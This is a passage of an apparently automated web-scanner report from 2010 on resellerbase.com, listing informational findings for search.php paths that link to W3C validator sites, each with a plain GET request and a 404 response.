Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/15/themes/kosmos/search.php

Issue detail

The page was loaded from a URL containing a query string:
The response contains the following links to other domains:

Request

GET /detail/15/themes/kosmos/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/15/themes/kosmos/
Cookie: COOKIE_SORT_ORDER=deleted; COOKIE_SORT_BY=deleted; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:19:53 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<td colspan="13" align="right">
<a href="http://validator.w3.org/check?uri=referer"><img src="http://www.resellerbase.com/themes/kosmos/images/xhtml.gif" border="0" alt="Valid XHTML 1.0 Transitional" /></a>
&nbsp;
<a href="http://jigsaw.w3.org/css-validator/check/referer"><img src="http://www.resellerbase.com/themes/kosmos/images/css.gif" border="0" alt="Valid CSS" />
...[SNIP]...

6.124. http://www.resellerbase.com/detail/15/themes/search.php

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/15/themes/search.php

Issue detail

The page was loaded from a URL containing a query string:
The response contains the following links to other domains:

Request

GET /detail/15/themes/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/15/themes/
Cookie: COOKIE_SORT_ORDER=deleted; COOKIE_SORT_BY=deleted; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:19:54 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<td colspan="13" align="right">
<a href="http://validator.w3.org/check?uri=referer"><img src="http://www.resellerbase.com/themes/kosmos/images/xhtml.gif" border="0" alt="Valid XHTML 1.0 Transitional" /></a>
&nbsp;
<a href="http://jigsaw.w3.org/css-validator/check/referer"><img src="http://www.resellerbase.com/themes/kosmos/images/css.gif" border="0" alt="Valid CSS" />
...[SNIP]...

6.125. http://www.resellerbase.com/detail/16/search.php

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/16/search.php

Issue detail

The page was loaded from a URL containing a query string:
The response contains the following links to other domains:

Request

GET /detail/16/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/16/worldkom-net.html
Cookie: PHPSESSID=3d2d0fc94e09db93396d3f0c490a8dd4;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:13:52 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<td colspan="13" align="right">
<a href="http://validator.w3.org/check?uri=referer"><img src="http://www.resellerbase.com/themes/kosmos/images/xhtml.gif" border="0" alt="Valid XHTML 1.0 Transitional" /></a>
&nbsp;
<a href="http://jigsaw.w3.org/css-validator/check/referer"><img src="http://www.resellerbase.com/themes/kosmos/images/css.gif" border="0" alt="Valid CSS" />
...[SNIP]...

6.126. http://www.resellerbase.com/detail/16/themes/kosmos/images/rating/search.php

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/16/themes/kosmos/images/rating/search.php

Issue detail

The page was loaded from a URL containing a query string:
The response contains the following links to other domains:

Request

GET /detail/16/themes/kosmos/images/rating/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/16/themes/kosmos/images/rating/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:13:37 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<td colspan="13" align="right">
<a href="http://validator.w3.org/check?uri=referer"><img src="http://www.resellerbase.com/themes/kosmos/images/xhtml.gif" border="0" alt="Valid XHTML 1.0 Transitional" /></a>
&nbsp;
<a href="http://jigsaw.w3.org/css-validator/check/referer"><img src="http://www.resellerbase.com/themes/kosmos/images/css.gif" border="0" alt="Valid CSS" />
...[SNIP]...

6.127. http://www.resellerbase.com/detail/16/themes/kosmos/images/search.php

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/16/themes/kosmos/images/search.php

Issue detail

The page was loaded from a URL containing a query string:
The response contains the following links to other domains:

Request

GET /detail/16/themes/kosmos/images/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/16/themes/kosmos/images/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:13:37 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<td colspan="13" align="right">
<a href="http://validator.w3.org/check?uri=referer"><img src="http://www.resellerbase.com/themes/kosmos/images/xhtml.gif" border="0" alt="Valid XHTML 1.0 Transitional" /></a>
&nbsp;
<a href="http://jigsaw.w3.org/css-validator/check/referer"><img src="http://www.resellerbase.com/themes/kosmos/images/css.gif" border="0" alt="Valid CSS" />
...[SNIP]...

6.128. http://www.resellerbase.com/detail/16/themes/kosmos/search.php

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/16/themes/kosmos/search.php

Issue detail

The page was loaded from a URL containing a query string:
The response contains the following links to other domains:

Request

GET /detail/16/themes/kosmos/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/16/themes/kosmos/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:13:44 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<td colspan="13" align="right">
<a href="http://validator.w3.org/check?uri=referer"><img src="http://www.resellerbase.com/themes/kosmos/images/xhtml.gif" border="0" alt="Valid XHTML 1.0 Transitional" /></a>
&nbsp;
<a href="http://jigsaw.w3.org/css-validator/check/referer"><img src="http://www.resellerbase.com/themes/kosmos/images/css.gif" border="0" alt="Valid CSS" />
...[SNIP]...

6.129. http://www.resellerbase.com/detail/16/themes/search.php

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/16/themes/search.php

Issue detail

The page was loaded from a URL containing a query string:
The response contains the following links to other domains:

Request

GET /detail/16/themes/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/16/themes/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:13:50 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<td colspan="13" align="right">
<a href="http://validator.w3.org/check?uri=referer"><img src="http://www.resellerbase.com/themes/kosmos/images/xhtml.gif" border="0" alt="Valid XHTML 1.0 Transitional" /></a>
&nbsp;
<a href="http://jigsaw.w3.org/css-validator/check/referer"><img src="http://www.resellerbase.com/themes/kosmos/images/css.gif" border="0" alt="Valid CSS" />
...[SNIP]...

6.130. http://www.resellerbase.com/detail/17/search.php

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/17/search.php

Issue detail

The page was loaded from a URL containing a query string:
The response contains the following links to other domains:

Request

GET /detail/17/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/17/resellerclub-com.html
Cookie: PHPSESSID=3d2d0fc94e09db93396d3f0c490a8dd4;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:15:48 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<td colspan="13" align="right">
<a href="http://validator.w3.org/check?uri=referer"><img src="http://www.resellerbase.com/themes/kosmos/images/xhtml.gif" border="0" alt="Valid XHTML 1.0 Transitional" /></a>
&nbsp;
<a href="http://jigsaw.w3.org/css-validator/check/referer"><img src="http://www.resellerbase.com/themes/kosmos/images/css.gif" border="0" alt="Valid CSS" />
...[SNIP]...

6.131. http://www.resellerbase.com/detail/17/themes/kosmos/images/rating/search.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/17/themes/kosmos/images/rating/search.php

Issue detail

The page was loaded from a URL containing a query string:
The response contains the following links to other domains:

Request

GET /detail/17/themes/kosmos/images/rating/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/17/themes/kosmos/images/rating/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:15:23 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<td colspan="13" align="right">
<a href="http://validator.w3.org/check?uri=referer"><img src="http://www.resellerbase.com/themes/kosmos/images/xhtml.gif" border="0" alt="Valid XHTML 1.0 Transitional" /></a>
&nbsp;
<a href="http://jigsaw.w3.org/css-validator/check/referer"><img src="http://www.resellerbase.com/themes/kosmos/images/css.gif" border="0" alt="Valid CSS" />
...[SNIP]...

6.132. http://www.resellerbase.com/detail/17/themes/kosmos/images/search.php

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/17/themes/kosmos/images/search.php

Issue detail

The page was loaded from a URL containing a query string:
The response contains the following links to other domains:

Request

GET /detail/17/themes/kosmos/images/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/17/themes/kosmos/images/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:15:25 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<td colspan="13" align="right">
<a href="http://validator.w3.org/check?uri=referer"><img src="http://www.resellerbase.com/themes/kosmos/images/xhtml.gif" border="0" alt="Valid XHTML 1.0 Transitional" /></a>
&nbsp;
<a href="http://jigsaw.w3.org/css-validator/check/referer"><img src="http://www.resellerbase.com/themes/kosmos/images/css.gif" border="0" alt="Valid CSS" />
...[SNIP]...

6.133. http://www.resellerbase.com/detail/17/themes/kosmos/search.php

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/17/themes/kosmos/search.php

Issue detail

The page was loaded from a URL containing a query string:
The response contains the following links to other domains:

Request

GET /detail/17/themes/kosmos/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/17/themes/kosmos/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:15:28 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<td colspan="13" align="right">
<a href="http://validator.w3.org/check?uri=referer"><img src="http://www.resellerbase.com/themes/kosmos/images/xhtml.gif" border="0" alt="Valid XHTML 1.0 Transitional" /></a>
&nbsp;
<a href="http://jigsaw.w3.org/css-validator/check/referer"><img src="http://www.resellerbase.com/themes/kosmos/images/css.gif" border="0" alt="Valid CSS" />
...[SNIP]...

6.134. http://www.resellerbase.com/detail/17/themes/search.php

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/17/themes/search.php

Issue detail

The page was loaded from a URL containing a query string:
The response contains the following links to other domains:

Request

GET /detail/17/themes/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/17/themes/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:15:29 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<td colspan="13" align="right">
<a href="http://validator.w3.org/check?uri=referer"><img src="http://www.resellerbase.com/themes/kosmos/images/xhtml.gif" border="0" alt="Valid XHTML 1.0 Transitional" /></a>
&nbsp;
<a href="http://jigsaw.w3.org/css-validator/check/referer"><img src="http://www.resellerbase.com/themes/kosmos/images/css.gif" border="0" alt="Valid CSS" />
...[SNIP]...

6.135. http://www.resellerbase.com/detail/18/search.php

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/18/search.php

Issue detail

The page was loaded from a URL containing a query string:
The response contains the following links to other domains:

Request

GET /detail/18/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/18/worlddatingpartners-com.html
Cookie: PHPSESSID=3d2d0fc94e09db93396d3f0c490a8dd4;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:11:45 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<td colspan="13" align="right">
<a href="http://validator.w3.org/check?uri=referer"><img src="http://www.resellerbase.com/themes/kosmos/images/xhtml.gif" border="0" alt="Valid XHTML 1.0 Transitional" /></a>
&nbsp;
<a href="http://jigsaw.w3.org/css-validator/check/referer"><img src="http://www.resellerbase.com/themes/kosmos/images/css.gif" border="0" alt="Valid CSS" />
...[SNIP]...

6.136. http://www.resellerbase.com/detail/18/themes/kosmos/images/rating/search.php

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/18/themes/kosmos/images/rating/search.php

Issue detail

The page was loaded from a URL containing a query string:
The response contains the following links to other domains:

Request

GET /detail/18/themes/kosmos/images/rating/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/18/themes/kosmos/images/rating/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:11:36 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<td colspan="13" align="right">
<a href="http://validator.w3.org/check?uri=referer"><img src="http://www.resellerbase.com/themes/kosmos/images/xhtml.gif" border="0" alt="Valid XHTML 1.0 Transitional" /></a>
&nbsp;
<a href="http://jigsaw.w3.org/css-validator/check/referer"><img src="http://www.resellerbase.com/themes/kosmos/images/css.gif" border="0" alt="Valid CSS" />
...[SNIP]...

6.137. http://www.resellerbase.com/detail/18/themes/kosmos/images/search.php

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/18/themes/kosmos/images/search.php

Issue detail

The page was loaded from a URL containing a query string:
The response contains the following links to other domains:

Request

GET /detail/18/themes/kosmos/images/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/18/themes/kosmos/images/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:11:38 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<td colspan="13" align="right">
<a href="http://validator.w3.org/check?uri=referer"><img src="http://www.resellerbase.com/themes/kosmos/images/xhtml.gif" border="0" alt="Valid XHTML 1.0 Transitional" /></a>
&nbsp;
<a href="http://jigsaw.w3.org/css-validator/check/referer"><img src="http://www.resellerbase.com/themes/kosmos/images/css.gif" border="0" alt="Valid CSS" />
...[SNIP]...

6.138. http://www.resellerbase.com/detail/18/themes/kosmos/search.php

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/18/themes/kosmos/search.php

Issue detail

The page was loaded from a URL containing a query string:
The response contains the following links to other domains:

Request

GET /detail/18/themes/kosmos/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/18/themes/kosmos/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:11:40 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<td colspan="13" align="right">
<a href="http://validator.w3.org/check?uri=referer"><img src="http://www.resellerbase.com/themes/kosmos/images/xhtml.gif" border="0" alt="Valid XHTML 1.0 Transitional" /></a>
&nbsp;
<a href="http://jigsaw.w3.org/css-validator/check/referer"><img src="http://www.resellerbase.com/themes/kosmos/images/css.gif" border="0" alt="Valid CSS" />
...[SNIP]...

6.139. http://www.resellerbase.com/detail/18/themes/search.php

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/18/themes/search.php

Issue detail

The page was loaded from a URL containing a query string:
The response contains the following links to other domains:

Request

GET /detail/18/themes/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/18/themes/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:11:42 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<td colspan="13" align="right">
<a href="http://validator.w3.org/check?uri=referer"><img src="http://www.resellerbase.com/themes/kosmos/images/xhtml.gif" border="0" alt="Valid XHTML 1.0 Transitional" /></a>
&nbsp;
<a href="http://jigsaw.w3.org/css-validator/check/referer"><img src="http://www.resellerbase.com/themes/kosmos/images/css.gif" border="0" alt="Valid CSS" />
...[SNIP]...

6.140. http://www.resellerbase.com/detail/19/search.php

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/19/search.php

Issue detail

The page was loaded from a URL containing a query string:
The response contains the following links to other domains:

Request

GET /detail/19/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/19/dating-central-com.html
Cookie: PHPSESSID=3d2d0fc94e09db93396d3f0c490a8dd4;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:12:33 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<td colspan="13" align="right">
<a href="http://validator.w3.org/check?uri=referer"><img src="http://www.resellerbase.com/themes/kosmos/images/xhtml.gif" border="0" alt="Valid XHTML 1.0 Transitional" /></a>
&nbsp;
<a href="http://jigsaw.w3.org/css-validator/check/referer"><img src="http://www.resellerbase.com/themes/kosmos/images/css.gif" border="0" alt="Valid CSS" />
...[SNIP]...

6.141. http://www.resellerbase.com/detail/19/themes/kosmos/images/rating/search.php

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/19/themes/kosmos/images/rating/search.php

Issue detail

The page was loaded from a URL containing a query string:
The response contains the following links to other domains:

Request

GET /detail/19/themes/kosmos/images/rating/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/19/themes/kosmos/images/rating/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:12:11 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<td colspan="13" align="right">
<a href="http://validator.w3.org/check?uri=referer"><img src="http://www.resellerbase.com/themes/kosmos/images/xhtml.gif" border="0" alt="Valid XHTML 1.0 Transitional" /></a>
&nbsp;
<a href="http://jigsaw.w3.org/css-validator/check/referer"><img src="http://www.resellerbase.com/themes/kosmos/images/css.gif" border="0" alt="Valid CSS" />
...[SNIP]...

6.142. http://www.resellerbase.com/detail/19/themes/kosmos/images/search.php

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/19/themes/kosmos/images/search.php

Issue detail

The page was loaded from a URL containing a query string:
The response contains the following links to other domains:

Request

GET /detail/19/themes/kosmos/images/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
